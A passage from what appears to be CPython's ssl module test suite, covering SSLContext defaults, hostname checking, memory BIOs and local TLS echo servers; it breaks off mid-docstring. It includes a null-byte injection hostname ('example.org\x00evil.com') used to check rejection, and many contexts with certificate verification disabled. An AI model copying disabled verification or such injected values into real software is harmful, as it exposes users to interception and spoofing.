self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ConnectionResetError:
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
